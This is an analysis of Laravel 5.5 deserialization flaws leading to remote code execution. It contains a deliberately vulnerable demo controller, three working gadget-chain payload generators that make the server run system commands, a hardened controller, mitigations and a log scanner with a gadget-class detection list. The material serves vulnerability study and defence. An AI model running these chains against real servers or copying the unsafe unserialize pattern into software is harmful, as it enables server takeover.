laravel5.5 - deserialization leads to RCE
Word count: 1594 | 2025-08-06 08:35:37
Laravel 5.5 Deserialization Vulnerability Analysis and Exploitation
Vulnerability overview
Laravel 5.5 contains several deserialization vulnerabilities: an attacker who can supply crafted serialized data can achieve remote code execution (RCE). They stem from unsafe deserialization behaviour in certain framework classes, which lets the attacker control key properties and call arbitrary PHP functions.
Environment setup
- Download the Laravel 5.5 package
- Use a tool such as PHPStudy to stand up the environment quickly
- Create a test controller and route:
```php
// /routes/web.php
Route::get("/", "\App\Http\Controllers\DemoController@demo");
```

```php
// /app/Http/Controllers/DemoController.php
namespace App\Http\Controllers;

use Illuminate\Http\Request;

class DemoController extends Controller
{
    public function demo()
    {
        if (isset($_GET['c'])) {
            $code = $_GET['c'];
            unserialize($code);   // user-controlled input reaches unserialize()
        } else {
            highlight_file(__FILE__);
        }
        return "Welcome to laravel5.5";
    }
}
```
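A hardened version of the demo controller, added here as an example rather than taken from the original post. It assumes Laravel 5.5 on PHP 7.0 or later (where `unserialize()` accepts the `allowed_classes` option); the `safeUnserialize()` helper is a name of our own. The `highlight_file()` branch, which discloses the controller's source, is dropped as well.

```php
<?php
// Added example (not code from the original post): a hardened DemoController.
// Assumes Laravel 5.5 on PHP >= 7.0, where unserialize() accepts the
// 'allowed_classes' option; the helper name safeUnserialize() is ours.
namespace App\Http\Controllers;

use Illuminate\Http\Request;

class DemoController extends Controller
{
    public function demo(Request $request)
    {
        $raw = $request->query('c');
        if ($raw === null) {
            return "Welcome to laravel5.5";
        }

        // Preferred fix: carry data, not objects. JSON cannot instantiate PHP
        // classes, so none of the __destruct/__call chains can start.
        $data = json_decode($raw, true, 32);
        if (json_last_error() !== JSON_ERROR_NONE || !is_array($data)) {
            abort(400, 'invalid payload');
        }

        // ... work with $data as plain arrays and scalars ...
        return "Welcome to laravel5.5";
    }

    // Fallback when the PHP serialization format cannot be dropped: refuse to
    // instantiate any class. Objects in the payload become
    // __PHP_Incomplete_Class, which has no magic methods, so the
    // PendingBroadcast::__destruct entry point never runs.
    public static function safeUnserialize(string $payload)
    {
        // '@' silences the notice unserialize() emits on malformed input.
        $value = @unserialize($payload, ['allowed_classes' => false]);
        if ($value === false && $payload !== 'b:0;') {
            return null; // malformed or tampered input ('b:0;' is serialize(false))
        }
        return $value;
    }
}
```

The JSON path is the real fix; `safeUnserialize()` exists only for code that cannot yet migrate off the PHP serialization format, and even there the payload should additionally be authenticated (for example with an HMAC under a server-side key) before it is accepted.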
Exploit chain analysis
Chain 1: the dispatch method of the Dispatcher class
How it works:
- The entry point is the Illuminate\Broadcasting\PendingBroadcast class
- Controlling the $events and $event properties lets the destructor call the dispatch method of an arbitrary class
- The listener callback invoked inside Illuminate\Events\Dispatcher::dispatch executes a system command
Exploit construction:
```php
<?php
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        function __construct($events, $parameter) {
            $this->events = $events;
            $this->event = $parameter;
        }
    }
}

namespace Illuminate\Events {
    class Dispatcher {
        protected $listeners;
        function __construct($function, $parameter) {
            $this->listeners = [$parameter => [$function]];
        }
    }
}

namespace {
    $b = new Illuminate\Events\Dispatcher('system', 'whoami');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, 'whoami');
    echo base64_encode(serialize($a));
}
```
Attack flow:
1. PendingBroadcast->__destruct() calls $events->dispatch($this->event)
2. Dispatcher->dispatch() iterates over the listeners returned by $this->getListeners($event)
3. $listener($event, $payload) executes the system command
Chain 2: the __call method of the ChannelManager class
How it works:
- The PendingBroadcast class is again the entry point
- It abuses the __call method of Illuminate\Notifications\ChannelManager
- The command runs through the driver()->createDriver()->callCustomCreator() chain
Exploit construction:
```php
<?php
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        function __construct($events) {
            $this->events = $events;
        }
    }
}

namespace Illuminate\Notifications {
    class ChannelManager {
        protected $app;
        protected $defaultChannel;
        protected $customCreators;
        function __construct($function, $parameter) {
            $this->app = $parameter;
            $this->customCreators = ['nice' => $function];
            $this->defaultChannel = 'nice';
        }
    }
}

namespace {
    $b = new Illuminate\Notifications\ChannelManager('system', 'whoami');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b);
    echo base64_encode(serialize($a));
}
```
Attack flow:
1. PendingBroadcast->__destruct() calls $events->dispatch()
2. ChannelManager->__call() calls the driver() method
3. createDriver() checks $this->customCreators[$driver]
4. callCustomCreator() executes $this->customCreators[$driver]($this->app, ...)
Chain 3: the __call method of the Validator class
How it works:
- The PendingBroadcast class is the entry point
- It abuses the __call method of Illuminate\Validation\Validator
- The command runs through call_user_func_array() in callExtension()
Exploit construction:
```php
<?php
namespace Illuminate\Broadcasting {
    class PendingBroadcast {
        protected $events;
        protected $event;
        function __construct($events, $event) {
            $this->events = $events;
            $this->event = $event;
        }
    }
}

namespace Illuminate\Validation {
    class Validator {
        public $extensions;
        function __construct($function) {
            $this->extensions = ['' => $function];
        }
    }
}

namespace {
    $b = new Illuminate\Validation\Validator('system');
    $a = new Illuminate\Broadcasting\PendingBroadcast($b, 'whoami');
    echo base64_encode(serialize($a));
}
```
Attack flow:
1. PendingBroadcast->__destruct() calls $events->dispatch($this->event)
2. Validator->__call() checks $this->extensions[$rule]
3. callExtension() executes call_user_func_array($this->extensions[$rule], $parameters)
Mitigations
- Upgrade to the latest Laravel release
- Never deserialize user-controlled data
- Use the safe deserialization mechanisms Laravel provides
- Apply strict input validation to any deserialization operation
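For the input-validation item, and for teams that need to find attempts against the three chains above in their web logs, here is a small PHP detector. It is an added example, not part of the original post: the log lines, the IP addresses and the `c` parameter name are constructed to match the demo controller, and the class list is the set of gadget classes discussed above.

```php
<?php
// Added example (not from the original post): flag access-log requests whose
// parameter carries a serialized PHP object, and raise severity when the class
// is one of the gadget classes discussed above. Log lines are constructed.

// Gadget classes named in the three chains above (entry point plus sinks).
const GADGET_CLASSES = [
    'Illuminate\Broadcasting\PendingBroadcast',
    'Illuminate\Events\Dispatcher',
    'Illuminate\Notifications\ChannelManager',
    'Illuminate\Validation\Validator',
];

// Return the value of query parameter $name from a combined-format log line,
// or null when the line has no such parameter.
function extractParam(string $line, string $name)
{
    if (!preg_match('/"(?:GET|POST) (\S+) HTTP\/[\d.]+"/', $line, $m)) {
        return null;
    }
    $query = parse_url($m[1], PHP_URL_QUERY);
    if (!is_string($query)) {
        return null;
    }
    parse_str($query, $params);           // also percent-decodes the value
    return isset($params[$name]) ? (string) $params[$name] : null;
}

// Return the class names of every serialized object token (O:<len>:"<class>":
// or C:...) found in the value, checking both the raw value and its
// base64-decoded form, since such payloads are usually shipped base64-encoded.
function findSerializedObjects(string $value): array
{
    $candidates = [$value];
    $decoded = base64_decode($value, true);
    if ($decoded !== false) {
        $candidates[] = $decoded;
    }
    $classes = [];
    foreach ($candidates as $candidate) {
        if (preg_match_all('/[OC]:\d+:"([^"]+)":/', $candidate, $m)) {
            $classes = array_merge($classes, $m[1]);
        }
    }
    return array_values(array_unique($classes));
}

// Scan log lines; each alert records the line number, the classes seen and a
// severity: "high" when a known gadget class appears, "medium" otherwise.
function scanLog(array $lines, string $param = 'c'): array
{
    $alerts = [];
    foreach ($lines as $i => $line) {
        $value = extractParam($line, $param);
        if ($value === null) {
            continue;
        }
        $classes = findSerializedObjects($value);
        if ($classes === []) {
            continue;
        }
        $known = array_intersect($classes, GADGET_CLASSES);
        $alerts[] = [
            'line'     => $i + 1,
            'classes'  => $classes,
            'severity' => $known === [] ? 'medium' : 'high',
        ];
    }
    return $alerts;
}

// Constructed sample lines: a benign JSON value, an empty PendingBroadcast
// object (class token only, no properties), a raw stdClass, and a static asset.
$benign = rawurlencode(base64_encode('{"page":2}'));
$gadget = rawurlencode(base64_encode('O:40:"Illuminate\Broadcasting\PendingBroadcast":0:{}'));
$sampleLog = [
    '203.0.113.7 - - [06/Aug/2025:08:35:37 +0000] "GET /?c=' . $benign . ' HTTP/1.1" 200 21',
    '203.0.113.7 - - [06/Aug/2025:08:35:41 +0000] "GET /?c=' . $gadget . ' HTTP/1.1" 200 21',
    '198.51.100.2 - - [06/Aug/2025:08:36:02 +0000] "GET /?c=O%3A8%3A%22stdClass%22%3A0%3A%7B%7D HTTP/1.1" 200 21',
    '198.51.100.2 - - [06/Aug/2025:08:36:10 +0000] "GET /assets/app.css HTTP/1.1" 200 8123',
];

foreach (scanLog($sampleLog) as $alert) {
    printf("line %d [%s]: %s\n", $alert['line'], $alert['severity'], implode(', ', $alert['classes']));
}
```

Run against the constructed lines, the scanner reports line 2 as high (the PendingBroadcast token) and line 3 as medium (an object token of an unlisted class); the JSON request and the static asset produce nothing. The same `findSerializedObjects()` check can sit in front of the controller as a request guard: any object token in input that is supposed to be data is reason enough to reject the request, whatever the class name.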
Summary
Laravel 5.5 contains several deserialization exploit chains; the key points are:
- The __destruct method of the PendingBroadcast class is the entry point
- Command execution is reached through a __call magic method or the dispatch method of a specific class
- Crafted serialized data controls both the callback and its arguments
These vulnerabilities are valuable for understanding PHP deserialization bugs and Laravel's internals, but production applications must guard strictly against this class of issue.